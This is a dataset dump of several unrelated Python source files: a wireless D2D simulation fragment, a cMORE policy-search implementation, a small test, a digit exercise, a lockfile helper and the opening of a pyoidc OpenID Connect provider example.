    (0, -250)
]
# MUE placed on the cell edge (distance bs_radius) at 45 degrees.
mue_position = (500 / math.sqrt(2), 500 / math.sqrt(2))
# Preset action index for each D2D pair (index into `actions`).
tx_powers_indexes = [
    4, 4, 4, 4
]
# actions = [i*0.82*p_max/5/1000 for i in range(5)] # best result
actions = [i for i in range(5)] # best result
n_agents = len(pairs_positions)
def run():
    """
    Run a single evaluation step on the module-level environment.

    Creates one agent per D2D pair, places the pairs and the MUE on the
    fixed module-level scenario, forces each agent to its preset transmit
    power index, performs one environment step, and plots positions plus
    a pie chart of each D2D transmitter's share of the interference at
    the base station.

    Raises:
        Exception: if `pairs_positions` and `tx_powers_indexes` disagree
            in length (the scenario would be inconsistent).
    """
    if len(pairs_positions) != len(tx_powers_indexes):
        raise Exception(
            'Different `pair_positions` and `tx_powers_indexes` lengths.'
        )
    agents = [Agent(agent_params, actions)
              for _ in range(n_agents)]  # 1 agent per d2d tx
    env.set_scenario(pairs_positions, mue_position, agents)
    obs = [env.get_state(a) for a in agents]
    total_reward = 0.0
    # Force each agent to its preset transmit-power index.
    for j, agent in enumerate(agents):
        agent.set_action(tx_powers_indexes[j])
    next_obs, rewards, _ = env.step(agents)
    obs = next_obs
    total_reward += sum(rewards)
    d2d_txs, d2d_rxs = zip(*env.d2d_pairs)
    # D2D interference on the MUE
    d2d_interferences = [
        d.tx_power * env.params.user_gain * env.params.bs_gain /
        pathloss_bs_users(d.distance_to_bs/1000) for d in d2d_txs
    ]
    d2d_total_interference = np.sum(d2d_interferences)
    if d2d_total_interference != 0:
        # Fix: divide only once the total is known non-zero. The original
        # computed the shares before this guard, producing NaNs and a NumPy
        # divide-by-zero warning whenever all transmit powers were zero.
        percentage_interferences = d2d_interferences / d2d_total_interference
        plot_positions_actions_pie(
            env.bs, env.mue, d2d_txs, d2d_rxs,
            tx_powers_indexes, percentage_interferences,
            obs[0][0][4].item(), sinr_threshold_mue,
            env.reward.item()
        )
    # show plots
    plt.show()
| 1,238 | 0 | 23 |
c5fd6aab5a84d25789ea2f8ec3a5bf04566738c0 | 8,691 | py | Python | reps/cmore.py | hanyas/reps | 447c461b89dec516ce3368d841cfe9734be78199 | [
"MIT"
] | 8 | 2021-06-21T18:58:56.000Z | 2021-12-13T09:47:41.000Z | reps/cmore.py | hanyas/reps | 447c461b89dec516ce3368d841cfe9734be78199 | [
"MIT"
] | null | null | null | reps/cmore.py | hanyas/reps | 447c461b89dec516ce3368d841cfe9734be78199 | [
"MIT"
] | 1 | 2021-06-29T04:42:45.000Z | 2021-06-29T04:42:45.000Z | import autograd.numpy as np
import scipy as sc
from scipy import optimize
from scipy import special
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import Ridge
import copy
| 30.928826 | 108 | 0.5149 | import autograd.numpy as np
import scipy as sc
from scipy import optimize
from scipy import special
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import Ridge
import copy
class Policy:
    """
    Linear-Gaussian contextual policy with polynomial context features:

        a ~ N(b + K * phi(c), cov)

    where phi(c) are polynomial features of the context c (no bias term).
    cMORE updates (b, K, cov) in closed form from a fitted quadratic
    reward model via `update`.
    """

    def __init__(self, context_dim, act_dim, degree, cov0):
        # Context and action dimensionalities.
        self.context_dim = context_dim
        self.act_dim = act_dim
        # Polynomial feature expansion of the context (bias excluded).
        self.degree = degree
        self.basis = PolynomialFeatures(self.degree, include_bias=False)
        # Number of polynomial features of `context_dim` inputs up to `degree`
        # (binomial count minus the excluded bias).
        self.nb_feat = int(sc.special.comb(self.degree + self.context_dim, self.degree) - 1)
        # Near-zero random init of the affine mean map a = b + K phi(c).
        self.b = 1e-8 * np.random.randn(self.act_dim, )
        self.K = 1e-8 * np.random.randn(self.act_dim, self.nb_feat)
        # Isotropic initial exploration covariance, scaled by cov0.
        self.cov = cov0 * np.eye(act_dim)

    def features(self, c):
        """Polynomial features of context(s) c, shape (n, nb_feat)."""
        return self.basis.fit_transform(c.reshape(-1, self.context_dim))

    def mean(self, c):
        """Mean action(s) b + K phi(c) for context(s) c."""
        feat = self.features(c)
        return self.b + np.einsum('...k,mk->...m', feat, self.K)

    def action(self, c, stoch=True):
        """Sample one action per context (stoch=True) or return the means."""
        mean = self.mean(c)
        if stoch:
            return np.array([np.random.multivariate_normal(mu, self.cov) for mu in mean])
        else:
            return mean

    def kli(self, pi, c):
        """
        Gaussian KL divergence KL(pi || self) (note the argument order:
        `self` is the reference/old policy), with the squared mean
        difference averaged over the contexts c.
        """
        diff = self.mean(c) - pi.mean(c)
        kl = 0.5 * (np.trace(np.linalg.inv(self.cov) @ pi.cov) +
                    np.mean(np.einsum('nk,kh,nh->n', diff, np.linalg.inv(self.cov), diff), axis=0) -
                    self.act_dim + np.log(np.linalg.det(self.cov) / np.linalg.det(pi.cov)))
        return kl

    def entropy(self):
        """Differential entropy 0.5 * log det(2*pi*e * cov) of the Gaussian."""
        return 0.5 * np.log(np.linalg.det(self.cov * 2.0 * np.pi * np.exp(1.0)))

    def update(self, eta, omega, model):
        """
        Closed-form MORE-style update from the quadratic reward model,
        given the dual variables eta (KL constraint) and omega (entropy
        constraint). Returns a NEW Policy; `self` is left untouched.
        """
        pol = copy.deepcopy(self)
        Raa, Rac, ra = model.Raa, model.Rac, model.ra
        b, K = self.b, self.K
        Q = self.cov
        Qi = np.linalg.inv(Q)
        # F is the (inverse) natural parameter of the updated Gaussian.
        F = np.linalg.inv(eta * Qi - 2.0 * Raa)
        L = eta * (Qi @ K) + 2.0 * Rac
        f = eta * (Qi @ b) + ra
        pol.cov = F * (eta + omega)
        pol.b = F @ f
        pol.K = F @ L
        return pol
class Model:
    """
    Quadratic surrogate of the reward over the stacked [action; context
    feature] vector, fitted with ridge regression:

        r(a, c) ~ r0 + [a; c]^T r + [a; c]^T R [a; c]

    The blocks of R and r (Raa, Rac, Rcc, ra, rc) are what
    `Policy.update` and the cMORE dual consume.
    """

    def __init__(self, act_dim, nb_cntxt_feat):
        self.nb_cntxt_feat = nb_cntxt_feat
        self.act_dim = act_dim
        # Full quadratic term and linear term over [action; context features].
        self.R = np.zeros((self.act_dim + self.nb_cntxt_feat, self.act_dim + self.nb_cntxt_feat))
        self.r = np.zeros((self.act_dim + self.nb_cntxt_feat, ))
        # Block views / scaled linear terms used by the policy update.
        self.Raa = np.zeros((self.act_dim, self.act_dim))
        self.ra = np.zeros((self.act_dim,))
        self.Rcc = np.zeros((self.nb_cntxt_feat, self.nb_cntxt_feat))
        self.rc = np.zeros((self.nb_cntxt_feat, ))
        self.Rac = np.zeros((self.act_dim, self.nb_cntxt_feat))
        self.r0 = np.zeros((1, ))

    def fit(self, phi, x, r):
        """
        Fit the quadratic reward model by ridge regression.

        :param phi: context features, shape (n_samples, nb_cntxt_feat)
        :param x: actions, shape (n_samples, act_dim)
        :param r: observed rewards, shape (n_samples,)
        """
        poly = PolynomialFeatures(2)
        # Design matrix stacks actions before context features.
        # (Renamed from `input`, which shadowed the builtin.)
        design = np.hstack((x, phi))
        feat = poly.fit_transform(design)
        reg = Ridge(alpha=1e-4, fit_intercept=False)
        reg.fit(feat, r)
        par = reg.coef_
        # PolynomialFeatures(2) orders coefficients as
        # [bias, linear terms, upper-triangular quadratic terms].
        self.r0 = par[0]
        self.r = par[1:self.act_dim + self.nb_cntxt_feat + 1]
        uid = np.triu_indices(self.act_dim + self.nb_cntxt_feat)
        self.R[uid] = par[self.act_dim + self.nb_cntxt_feat + 1:]
        self.R.T[uid] = self.R[uid]
        self.Raa = self.R[:self.act_dim, :self.act_dim]
        self.Rcc = self.R[-self.nb_cntxt_feat:, -self.nb_cntxt_feat:]
        self.Rac = self.R[:self.act_dim, -self.nb_cntxt_feat:]
        self.ra = 2.0 * self.r[:self.act_dim]
        self.rc = 2.0 * self.r[self.act_dim:]
        # Enforce NEGATIVE (semi-)definiteness of the action curvature Raa
        # (the closed-form update needs a concave model in the action):
        # clip any non-negative eigenvalue to a tiny negative value, then
        # re-symmetrize. (The original comment said "positive definitness",
        # which contradicted what the code does.)
        w, v = np.linalg.eig(self.Raa)
        w[w >= 0.0] = -1e-12
        self.Raa = v @ np.diag(w) @ v.T
        self.Raa = 0.5 * (self.Raa + self.Raa.T)
class cMORE:
    """
    Contextual MORE-style policy search.

    Each iteration: sample episodes from the linear-Gaussian contextual
    policy, fit a quadratic reward surrogate, solve the dual problem for
    the KL (eta) and entropy (omega) multipliers with L-BFGS-B, and
    update the policy in closed form.
    """

    def __init__(self, func, nb_episodes,
                 kl_bound, ent_rate,
                 cntxt_degree, **kwargs):
        # `func` is the objective; it must expose act_dim, cntxt_dim,
        # context(n) and eval(c, x).
        self.func = func
        self.act_dim = self.func.act_dim
        self.cntxt_dim = self.func.cntxt_dim
        self.nb_episodes = nb_episodes
        self.kl_bound = kl_bound
        self.ent_rate = ent_rate
        self.cntxt_degree = cntxt_degree
        self.basis = PolynomialFeatures(self.cntxt_degree, include_bias=False)
        self.nb_cntxt_feat = int(sc.special.comb(self.cntxt_degree + self.cntxt_dim, self.cntxt_degree) - 1)
        cov0 = kwargs.get('cov0', 100.)
        # NOTE(review): Policy.__init__ is declared as
        # (context_dim, act_dim, degree, cov0) but is called here with
        # (act_dim, cntxt_dim, ...) - the first two arguments look swapped
        # (harmless only when act_dim == cntxt_dim); verify.
        self.ctl = Policy(self.act_dim, self.cntxt_dim,
                          self.cntxt_degree, cov0)
        self.h0 = kwargs.get('h0', 75.0)
        self.model = Model(self.act_dim, self.nb_cntxt_feat)
        # Dual variables of the KL and entropy constraints.
        self.eta = np.array([1.0])
        self.omega = np.array([1.0])
        # Last sampled batch and its context features.
        self.data = None
        self.phi = None

    def sample(self, nb_episodes):
        """Draw contexts, act with the current policy, evaluate rewards."""
        data = {'c': self.func.context(nb_episodes)}
        data['x'] = self.ctl.action(data['c'])
        data['r'] = self.func.eval(data['c'], data['x'])
        return data

    def features(self, c):
        """Polynomial features of context(s) c, shape (n, nb_cntxt_feat)."""
        return self.basis.fit_transform(c.reshape(-1, self.cntxt_dim))

    def dual(self, var, eps, beta, ctl, model, phi):
        """
        Dual objective g(eta, omega) of the constrained policy update,
        averaged over the sampled context features phi.

        :param var: stacked dual variables (eta, omega)
        :param eps: KL bound
        :param beta: entropy bound
        :param ctl: current policy, :param model: quadratic reward model
        :param phi: context features of the sampled batch
        """
        eta = var[0]
        omega = var[1]
        Raa, Rac, ra = model.Raa, model.Rac, model.ra
        b, K, Q = ctl.b, ctl.K, ctl.cov
        Qi = np.linalg.inv(Q)
        F = eta * Qi - 2 * Raa
        Fi = np.linalg.inv(F)
        f = eta * (Qi @ b) + ra
        L = eta * (Qi @ K) + 2 * Rac
        M = 0.5 * (L.T @ (Fi @ L) - eta * K.T @ (Qi @ K))
        _, q_lgdt = np.linalg.slogdet(2.0 * np.pi * Q)
        _, f_lgdt = np.linalg.slogdet(2.0 * np.pi * (eta + omega) * Fi)
        g = eta * eps - omega * beta - 0.5 * eta * b.T @ Qi @ b\
            + 0.5 * f.T @ Fi @ f - 0.5 * eta * q_lgdt + 0.5 * (eta + omega) * f_lgdt\
            + np.mean(phi @ (L.T @ (Fi @ f) - eta * K.T @ (Qi @ b)))\
            + np.mean(np.sum((phi @ M).T * phi.T, axis=0))
        return g

    def grad(self, var, eps, beta, ctl, model, phi):
        """Analytic gradient of `dual` w.r.t. (eta, omega), as a 2-vector."""
        eta = var[0]
        omega = var[1]
        Raa, Rac, ra = model.Raa, model.Rac, model.ra
        b, K, Q= ctl.b, ctl.K, ctl.cov
        Qi = np.linalg.inv(Q)
        F = eta * Qi - 2 * Raa
        Fi = np.linalg.inv(F)
        f = eta * (Qi @ b) + ra
        L = eta * (Qi @ K) + 2 * Rac
        M = 0.5 * (L.T @ (Fi @ L) - eta * K.T @ (Qi @ K))
        _, q_lgdt = np.linalg.slogdet(2.0 * np.pi * Q)
        _, f_lgdt = np.linalg.slogdet(2.0 * np.pi * (eta + omega) * Fi)
        # Derivatives of Fi and f with respect to eta.
        dFi_deta = - (Fi.T @ (Qi @ Fi))
        df_deta = Qi @ b
        deta0 = eps - 0.5 * b.T @ df_deta + 0.5 * f.T @ dFi_deta @ f + f.T @ (Fi @ df_deta)\
                - 0.5 * q_lgdt + 0.5 * f_lgdt - 0.5 * (eta + omega) * np.trace(Fi @ Qi)\
                + 0.5 * self.act_dim
        detal = L.T @ (Fi @ df_deta) - L.T @ (Fi.T @ (Qi @ (Fi @ f)))\
                + (Qi @ K).T @ (Fi @ f) - K.T @ (Qi @ b)
        detaq = 0.5 * L.T @ (dFi_deta @ L) + (Qi @ K).T @ (Fi @ L) - 0.5 * K.T @ Qi @ K
        deta = deta0 + np.mean(phi @ detal, axis=0) + np.mean(np.sum((phi @ detaq).T * phi.T, axis=0))
        domega = - beta + 0.5 * (f_lgdt + self.act_dim)
        return np.hstack([deta, domega])

    def run(self, nb_iter=100, verbose=False):
        """
        Run the cMORE loop for `nb_iter` iterations.

        Returns a trace dict with per-iteration mean reward ('rwrd'),
        realized KL step ('kl') and policy entropy ('ent'). Stops early
        if the entropy collapses below -300.
        """
        trace = {'rwrd': [], 'kl': [], 'ent': []}
        for it in range(nb_iter):
            # update entropy bound (geometric decrease towards -h0)
            ent_bound = self.ent_rate * (self.ctl.entropy() + self.h0) - self.h0
            # sample current policy
            self.data = self.sample(self.nb_episodes)
            rwrd = np.mean(self.data['r'])
            # get context features
            self.phi = self.features(self.data['c'])
            # fit quadratic model
            self.model.fit(self.phi, self.data['x'], self.data['r'])
            # optimize dual
            init = np.stack((100.0, 1000.0))
            bnds = ((1e-8, 1e8), (1e-8, 1e8))
            res = sc.optimize.minimize(self.dual, init,
                                       method='L-BFGS-B', jac=self.grad,
                                       args=(self.kl_bound, ent_bound,
                                             self.ctl, self.model, self.phi),
                                       bounds=bnds)
            self.eta = res.x[0]
            self.omega = res.x[1]
            # update policy
            pi = self.ctl.update(self.eta, self.omega, self.model)
            # check kl (realized KL of the step, for diagnostics)
            kl = self.ctl.kli(pi, self.data['c'])
            self.ctl = pi
            ent = self.ctl.entropy()
            trace['rwrd'].append(rwrd)
            trace['kl'].append(kl)
            trace['ent'].append(ent)
            if verbose:
                print('it=', it, f'rwrd={rwrd:{5}.{4}}',
                      f'kl={kl:{5}.{4}}',
                      f'ent={ent:{5}.{4}}')
            if ent < -3e2:
                break
        return trace
| 8,033 | -26 | 474 |
2e15e14410009c204ee1fd1d8c430864f2e208fa | 681 | py | Python | tests/test_losses.py | feng-y16/Hamiltonian-Generative-Networks | 702d3ff3aec40eba20e17c5a1612b5b0b1e2f831 | [
"MIT"
] | 29 | 2020-09-14T11:59:03.000Z | 2022-03-10T16:31:19.000Z | tests/test_losses.py | feng-y16/Hamiltonian-Generative-Networks | 702d3ff3aec40eba20e17c5a1612b5b0b1e2f831 | [
"MIT"
] | 49 | 2020-09-14T12:33:51.000Z | 2021-01-21T22:52:17.000Z | tests/test_losses.py | feng-y16/Hamiltonian-Generative-Networks | 702d3ff3aec40eba20e17c5a1612b5b0b1e2f831 | [
"MIT"
] | 7 | 2020-11-10T16:20:31.000Z | 2022-01-09T10:49:59.000Z | import torch
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from utilities.losses import kld_loss
test_kld_loss() | 29.608696 | 81 | 0.668135 | import torch
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from utilities.losses import kld_loss
def test_kld_loss():
    """Check that kld_loss reduces 2-D and 4-D batched inputs to a scalar."""
    batch_sizes = [1, 10, 100]
    latent_size = 8
    # Exercise every batch size. The original iterated the debug leftover
    # `[10]` and left `batch_sizes` unused, defeating the test's intent.
    for batch_size in batch_sizes:
        mu = torch.randn((batch_size, latent_size))
        logvar = torch.randn((batch_size, latent_size))
        kld = kld_loss(mu, logvar)
        assert kld.dim() == 0
        mu = torch.randn((batch_size, latent_size, latent_size, latent_size))
        logvar = torch.randn((batch_size, latent_size, latent_size, latent_size))
        kld = kld_loss(mu, logvar)
        assert kld.dim() == 0
test_kld_loss() | 493 | 0 | 23 |
4c9f191f559541a62f958864ace3c9c32de00e4d | 257 | py | Python | python-mundo1/ex023.py | abm-astro/estudos-python | c0dcd71489e528d445efa25d4986bf2fd08f8fe6 | [
"MIT"
] | 1 | 2021-08-15T18:18:43.000Z | 2021-08-15T18:18:43.000Z | python-mundo1/ex023.py | abm-astro/estudos-python | c0dcd71489e528d445efa25d4986bf2fd08f8fe6 | [
"MIT"
] | null | null | null | python-mundo1/ex023.py | abm-astro/estudos-python | c0dcd71489e528d445efa25d4986bf2fd08f8fe6 | [
"MIT"
] | null | null | null | number = int(input('Digite um nรบmero de atรฉ 4 algarismos: '))
print(f'Analisando o nรบmero {number} ...')
# Extract each decimal digit of `number` by place value.
# (The original units line used `// 1`, a no-op floor division.)
u = number % 10  # unidade (units)
d = number // 10 % 10  # dezena (tens)
c = number // 100 % 10  # centena (hundreds)
m = number // 1000 % 10  # milhar (thousands)
print(f'Unidade: {u}\nDezena: {d}\nCentena: {c}\nMilhar: {m}') | 36.714286 | 62 | 0.614786 | number = int(input('Digite um nรบmero de atรฉ 4 algarismos: '))
print(f'Analisando o nรบmero {number} ...')
# Extract each decimal digit of `number` by place value.
# (The original units line used `// 1`, a no-op floor division.)
u = number % 10  # unidade (units)
d = number // 10 % 10  # dezena (tens)
c = number // 100 % 10  # centena (hundreds)
m = number // 1000 % 10  # milhar (thousands)
print(f'Unidade: {u}\nDezena: {d}\nCentena: {c}\nMilhar: {m}') | 0 | 0 | 0 |
0445556ee9637cca8a8f03fdbe424f60d870d8ec | 1,351 | py | Python | python/lockfile/Lockfile.py | devastating/misc | f9922e14a9305808e668d8412b7a2443a7f45a0d | [
"MIT"
] | null | null | null | python/lockfile/Lockfile.py | devastating/misc | f9922e14a9305808e668d8412b7a2443a7f45a0d | [
"MIT"
] | null | null | null | python/lockfile/Lockfile.py | devastating/misc | f9922e14a9305808e668d8412b7a2443a7f45a0d | [
"MIT"
] | null | null | null | #!/usr/bin/python
'''
Simple implementation for Linux lockfile
'''
import os
import time
def LockFile(target, retry=30, timeout=1):
    '''
    Acquire an exclusive cross-process lock for "target".

    Use this method if you want to make sure only one process opens
    the "target" file. The "target" path should be a path to a file
    in an existing folder.

    The lock is an atomically-created sibling folder
    (".lock-<basename>") next to "target": os.mkdir either succeeds for
    exactly one process or raises OSError, so there is no race window.

    :param target: path to the file to lock; its parent folder must exist
    :param retry: maximum number of mkdir attempts before giving up
    :param timeout: seconds to sleep between attempts
    @return True: succeed; False: failed
    '''
    targetDir = os.path.dirname(os.path.realpath(target))
    if os.path.exists(targetDir) is False:
        # Cannot place a lock folder next to a non-existent directory.
        return False
    lockFolder = os.path.join(targetDir, ".lock-" + os.path.basename(target))
    for attempt in range(retry):
        try:
            os.mkdir(lockFolder)
            return True
        except OSError:
            # Lock is held (or mkdir failed); wait and retry. Fix: the
            # original also slept after the FINAL failed attempt, wasting
            # up to `timeout` seconds before returning False.
            if attempt + 1 < retry:
                time.sleep(timeout)
    return False
def ReleaseFile(target):
    '''
    Drop the lock taken by LockFile() on "target".

    Removes the sibling lock folder (".lock-<basename>") if possible.
    A missing parent directory, or a lock folder that is already gone,
    both count as success.

    @return True: succeed; False: failed
    '''
    parent = os.path.dirname(os.path.realpath(target))
    if not os.path.exists(parent):
        return True
    lock_dir = os.path.join(parent, ".lock-" + os.path.basename(target))
    try:
        os.rmdir(lock_dir)
    except OSError:
        # rmdir failed: report success only if the folder is in fact gone.
        return not os.path.exists(lock_dir)
    return True
| 27.02 | 77 | 0.646188 | #!/usr/bin/python
'''
Simple implementation for Linux lockfile
'''
import os
import time
def LockFile(target, retry=30, timeout=1):
    '''
    Acquire an exclusive cross-process lock for "target".

    Use this method if you want to make sure only one process opens
    the "target" file. The "target" path should be a path to a file
    in an existing folder.

    The lock is an atomically-created sibling folder
    (".lock-<basename>") next to "target": os.mkdir either succeeds for
    exactly one process or raises OSError, so there is no race window.

    :param target: path to the file to lock; its parent folder must exist
    :param retry: maximum number of mkdir attempts before giving up
    :param timeout: seconds to sleep between attempts
    @return True: succeed; False: failed
    '''
    targetDir = os.path.dirname(os.path.realpath(target))
    if os.path.exists(targetDir) is False:
        # Cannot place a lock folder next to a non-existent directory.
        return False
    lockFolder = os.path.join(targetDir, ".lock-" + os.path.basename(target))
    for attempt in range(retry):
        try:
            os.mkdir(lockFolder)
            return True
        except OSError:
            # Lock is held (or mkdir failed); wait and retry. Fix: the
            # original also slept after the FINAL failed attempt, wasting
            # up to `timeout` seconds before returning False.
            if attempt + 1 < retry:
                time.sleep(timeout)
    return False
def ReleaseFile(target):
    '''
    Drop the lock taken by LockFile() on "target".

    Removes the sibling lock folder (".lock-<basename>") if possible.
    A missing parent directory, or a lock folder that is already gone,
    both count as success.

    @return True: succeed; False: failed
    '''
    parent = os.path.dirname(os.path.realpath(target))
    if not os.path.exists(parent):
        return True
    lock_dir = os.path.join(parent, ".lock-" + os.path.basename(target))
    try:
        os.rmdir(lock_dir)
    except OSError:
        # rmdir failed: report success only if the folder is in fact gone.
        return not os.path.exists(lock_dir)
    return True
| 0 | 0 | 0 |
8a4eee6bbaa12039e95643fb0658e9efe65e588b | 18,494 | py | Python | oidc_example/op3/server.py | kschu91/pyoidc | ae5702a8b2f13d5e7af173a58355cd738ec79a31 | [
"Apache-2.0"
] | 373 | 2017-03-08T21:37:03.000Z | 2022-03-24T13:37:23.000Z | oidc_example/op3/server.py | kschu91/pyoidc | ae5702a8b2f13d5e7af173a58355cd738ec79a31 | [
"Apache-2.0"
] | 523 | 2017-03-02T17:03:12.000Z | 2022-03-24T18:34:51.000Z | oidc_example/op3/server.py | kschu91/pyoidc | ae5702a8b2f13d5e7af173a58355cd738ec79a31 | [
"Apache-2.0"
] | 165 | 2017-03-02T16:54:42.000Z | 2022-02-26T18:34:00.000Z | #!/usr/bin/env python
__author__ = 'Vahid Jalili'
from urllib.parse import parse_qs
import json
import os
import re
import sys
import traceback
import argparse
import importlib
import logging
from mako.lookup import TemplateLookup
from oic import rndstr
from oic.oic.provider import AuthorizationEndpoint
from oic.oic.provider import EndSessionEndpoint
from oic.oic.provider import Provider
from oic.oic.provider import RegistrationEndpoint
from oic.oic.provider import TokenEndpoint
from oic.oic.provider import UserinfoEndpoint
from oic.utils import shelve_wrapper
from oic.utils.authn.authn_context import AuthnBroker
from oic.utils.authn.authn_context import make_auth_verify
from oic.utils.authn.client import verify_client
from oic.utils.authn.multi_auth import AuthnIndexedEndpointWrapper
from oic.utils.authn.user import UsernamePasswordMako
from oic.utils.authz import AuthzHandling
from oic.utils.http_util import *
from oic.utils.keyio import keyjar_init
from oic.utils.userinfo import UserInfo
from oic.utils.webfinger import OIC_ISSUER
from oic.utils.webfinger import WebFinger
from cherrypy import wsgiserver
from cherrypy.wsgiserver.ssl_builtin import BuiltinSSLAdapter
from oic.utils.sdb import create_session_db
LOGGER = logging.getLogger("")
LOGFILE_NAME = 'oc.log'
hdlr = logging.FileHandler(LOGFILE_NAME)
base_formatter = logging.Formatter(
"%(asctime)s %(name)s:%(levelname)s %(message)s")
CPC = ('%(asctime)s %(name)s:%(levelname)s '
'[%(client)s,%(path)s,%(cid)s] %(message)s')
cpc_formatter = logging.Formatter(CPC)
hdlr.setFormatter(base_formatter)
LOGGER.addHandler(hdlr)
LOGGER.setLevel(logging.DEBUG)
logger = logging.getLogger('oicServer')
# noinspection PyUnresolvedReferences
if __name__ == '__main__':
root = './'
lookup = TemplateLookup(directories=[root + 'Templates', root + 'htdocs'],
module_directory=root + 'modules',
input_encoding='utf-8', output_encoding='utf-8')
usernamePasswords = {
"user1": "1",
"user2": "2"
}
passwordEndPointIndex = 0 # what is this, and what does its value mean?
# JWKS: JSON Web Key
jwksFileName = "static/jwks.json"
# parse the parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', dest='config')
parser.add_argument('-d', dest='debug', action='store_true')
args = parser.parse_args()
# parse and setup configuration
config = importlib.import_module(args.config)
config.ISSUER = config.ISSUER + ':{}/'.format(config.PORT)
config.SERVICEURL = config.SERVICEURL.format(issuer=config.ISSUER)
endPoints = config.AUTHENTICATION["UserPassword"]["EndPoints"]
fullEndPointsPath = ["%s%s" % (config.ISSUER, ep) for ep in endPoints]
# TODO: why this instantiation happens so early? can I move it later?
# An OIDC Authorization/Authentication server is designed to
# allow more than one authentication method to be used by the server.
# And that is what the AuthBroker is for.
# Given information about the authorisation request, the AuthBroker
# chooses which method(s) to be used for authenticating the person/entity.
# According to the OIDC standard a Relaying Party can say
# 'I want this type of authentication', and the AuthnBroker tries to pick
# methods from the set it has been supplied, to map that request.
authnBroker = AuthnBroker()
# UsernamePasswordMako: authenticas a user using the username/password form in a
# WSGI environment using Mako as template system
usernamePasswordAuthn = UsernamePasswordMako(
None, # server instance
"login.mako", # a mako template
lookup, # lookup template
usernamePasswords, # username/password dictionary-like database
"%sauthorization" % config.ISSUER, # where to send the user after authentication
None, # templ_arg_func ??!!
fullEndPointsPath) # verification endpoints
# AuthnIndexedEndpointWrapper is a wrapper class for using an authentication module with multiple endpoints.
authnIndexedEndPointWrapper = AuthnIndexedEndpointWrapper(usernamePasswordAuthn, passwordEndPointIndex)
authnBroker.add(config.AUTHENTICATION["UserPassword"]["ACR"], # (?!)
authnIndexedEndPointWrapper, # (?!) method: an identifier of the authentication method.
config.AUTHENTICATION["UserPassword"]["WEIGHT"], # security level
"") # (?!) authentication authority
# ?!
authz = AuthzHandling()
clientDB = shelve_wrapper.open(config.CLIENTDB)
# In-Memory non-persistent SessionDB issuing DefaultTokens
sessionDB = create_session_db(config.ISSUER,
secret=rndstr(32),
password=rndstr(32))
provider = Provider(
name=config.ISSUER, # name
sdb=sessionDB, # session database.
cdb=clientDB, # client database
authn_broker=authnBroker, # authn broker
userinfo=None, # user information
authz=authz, # authz
client_authn=verify_client, # client authentication
symkey=config.SYM_KEY, # Used for Symmetric key authentication
# urlmap = None, # ?
# keyjar = None, # ?
# hostname = "", # ?
template_renderer=mako_renderer, # Rendering custom templates
# verify_ssl = True, # Enable SSL certs
# capabilities = None, # ?
# schema = OpenIDSchema, # ?
# jwks_uri = '', # ?
# jwks_name = '', # ?
baseurl=config.ISSUER,
# client_cert = None # ?
)
# SessionDB:
# This is database where the provider keeps information about
# the authenticated/authorised users. It includes information
# such as "what has been asked for (claims, scopes, and etc. )"
# and "the state of the session". There is one entry in the
# database per person
#
# __________ Note __________
# provider.keyjar is an interesting parameter,
# currently it uses default values, but
# if you have time, it worth investigating.
for authnIndexedEndPointWrapper in authnBroker:
authnIndexedEndPointWrapper.srv = provider
# TODO: this is a point to consider: what if user data in a database?
if config.USERINFO == "SIMPLE":
provider.userinfo = UserInfo(config.USERDB)
provider.cookie_ttl = config.COOKIETTL
provider.cookie_name = config.COOKIENAME
if args.debug:
provider.debug = True
try:
# JWK: JSON Web Key
# JWKS: is a dictionary of JWK
# __________ NOTE __________
# JWKS contains private key information.
#
# keyjar_init configures cryptographic key
# based on the provided configuration "keys".
jwks = keyjar_init(
provider, # server/client instance
config.keys, # key configuration
kid_template="op%d") # template by which to build the kids (key ID parameter)
except Exception as err:
# LOGGER.error("Key setup failed: %s" % err)
provider.key_setup("static", sig={"format": "jwk", "alg": "rsa"})
else:
for key in jwks["keys"]:
for k in key.keys():
key[k] = as_unicode(key[k])
f = open(jwksFileName, "w")
f.write(json.dumps(jwks))
f.close()
provider.jwks_uri = "%s%s" % (provider.baseurl, jwksFileName)
# for b in OAS.keyjar[""]:
# LOGGER.info("OC3 server keys: %s" % b)
# TODO: Questions:
# END_POINT is defined as a dictionary in the configuration file,
# why not defining it as string with "verify" value?
# after all, we have only one end point.
# can we have multiple end points for password? why?
endPoint = config.AUTHENTICATION["UserPassword"]["EndPoints"][passwordEndPointIndex]
_urls = []
_urls.append((r'^' + endPoint, make_auth_verify(authnIndexedEndPointWrapper.verify)))
_app = Application(provider, _urls)
# Setup the web server
server = wsgiserver.CherryPyWSGIServer(('0.0.0.0', config.PORT), _app.application) # nosec
server.ssl_adapter = BuiltinSSLAdapter(config.SERVER_CERT, config.SERVER_KEY)
print("OIDC Provider server started (issuer={}, port={})".format(config.ISSUER, config.PORT))
try:
server.start()
except KeyboardInterrupt:
server.stop()
| 37.975359 | 119 | 0.610414 | #!/usr/bin/env python
__author__ = 'Vahid Jalili'
from urllib.parse import parse_qs
import json
import os
import re
import sys
import traceback
import argparse
import importlib
import logging
from mako.lookup import TemplateLookup
from oic import rndstr
from oic.oic.provider import AuthorizationEndpoint
from oic.oic.provider import EndSessionEndpoint
from oic.oic.provider import Provider
from oic.oic.provider import RegistrationEndpoint
from oic.oic.provider import TokenEndpoint
from oic.oic.provider import UserinfoEndpoint
from oic.utils import shelve_wrapper
from oic.utils.authn.authn_context import AuthnBroker
from oic.utils.authn.authn_context import make_auth_verify
from oic.utils.authn.client import verify_client
from oic.utils.authn.multi_auth import AuthnIndexedEndpointWrapper
from oic.utils.authn.user import UsernamePasswordMako
from oic.utils.authz import AuthzHandling
from oic.utils.http_util import *
from oic.utils.keyio import keyjar_init
from oic.utils.userinfo import UserInfo
from oic.utils.webfinger import OIC_ISSUER
from oic.utils.webfinger import WebFinger
from cherrypy import wsgiserver
from cherrypy.wsgiserver.ssl_builtin import BuiltinSSLAdapter
from oic.utils.sdb import create_session_db
LOGGER = logging.getLogger("")
LOGFILE_NAME = 'oc.log'
hdlr = logging.FileHandler(LOGFILE_NAME)
base_formatter = logging.Formatter(
"%(asctime)s %(name)s:%(levelname)s %(message)s")
CPC = ('%(asctime)s %(name)s:%(levelname)s '
'[%(client)s,%(path)s,%(cid)s] %(message)s')
cpc_formatter = logging.Formatter(CPC)
